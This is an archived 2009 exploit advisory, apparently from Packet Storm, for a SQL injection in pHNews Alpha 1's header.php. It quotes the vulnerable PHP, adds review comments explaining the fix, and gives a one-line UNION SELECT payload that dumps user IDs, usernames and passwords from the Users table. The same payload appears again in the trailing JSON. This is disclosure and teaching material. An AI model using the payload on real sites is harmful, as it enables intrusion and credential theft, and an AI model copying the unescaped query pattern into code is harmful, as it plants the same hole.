ID PACKETSTORM:74996
Type packetstorm
Reporter X0r
Modified 2009-02-17T00:00:00
Description
`#########################################################################################
[0x01] Information:
Name : pHNews Alpha 1
Download : http://www.hotscripts.com/listings/jump/download/50111/
Vulnerability : SQL Injection
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
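The vulnerable file is /[path]/header.php: the `mod` request parameter reaches the SQL query below without escaping or parameter binding.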
[Code]
// Excerpt from header.php: selects the row of the Modules table whose name
// matches the requested module. The excerpt ends before the closing brace of
// the `if ($mod != "nomod")` block.
// NOTE(review): $mod is read straight from the query string; nothing in this
// excerpt validates, casts or escapes it before it is used below.
$mod = $_GET["mod"];
// If no mod is selected select the default (news)
if ($mod == "") { $mod = "news"; }
// NOTE(review): the only value kept away from the query is the literal
// "nomod"; any other string, whatever its content, continues to the SELECT.
if ($mod != "nomod") {
// Subit the query... god soooo mmmuuuccchhh coooodeee
// NOTE(review): root cause of the advisory. The request value is interpolated
// between single quotes in the SQL text, so a quote character inside $mod ends
// the string literal and the remainder is parsed as SQL.
// Fix: pass $mod as a bound parameter of a prepared statement (PDO or mysqli);
// if module names form a fixed set, also check $mod against an allowlist first.
$query = "SELECT * FROM Modules WHERE name = '{$mod}'";
// NOTE(review): on failure the raw mysql_error() text is written to the
// response by die(), which exposes database error details to the requester.
// Log the error server-side and return a generic message instead. The mysql_*
// extension used here was removed in PHP 7.
$result = mysql_query($query) or die('Query failed: ' . mysql_error());
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: http://victim.org/header.php?mod=' union select
0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users--
########################################################################################
`
{"id": "PACKETSTORM:74996", "type": "packetstorm", "bulletinFamily": "exploit", "title": "pHNews Alpha 1 SQL Injection", "description": "", "published": "2009-02-17T00:00:00", "modified": "2009-02-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/74996/pHNews-Alpha-1-SQL-Injection.html", "reporter": "X0r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:03", "viewCount": 1, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-11-03T10:19:03", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:03", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/74996/phnews-sql.txt", "sourceData": "`######################################################################################### \n[0x01] Informations: \n \nName : pHNews Alpha 1 \nDownload : http://www.hotscripts.com/listings/jump/download/50111/ \nVulnerability : Sql Injection \nAuthor : x0r \nContact : andry2000@hotmail.it \nNotes : Proud to be Italian \n######################################################################################### \n[0x02] Bug: \n \nBugged file is /[path]/header.php \n \n[Code] \n$mod = $_GET[\"mod\"]; \n// If no mod is selected select the default (news) \nif ($mod == \"\") { $mod = \"news\"; } \nif ($mod != \"nomod\") { \n \n// Subit the query... god soooo mmmuuuccchhh coooodeee \n$query = \"SELECT * FROM Modules WHERE name = '{$mod}'\"; \n$result = mysql_query($query) or die('Query failed: ' . mysql_error()); \n[/code] \n \n \n######################################################################################### \n[0x03] Exploit: \n \nExploit: http://victim.org/header.php?mod=' union select \n0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users-- \n######################################################################################## \n \n \n`\n"}
{}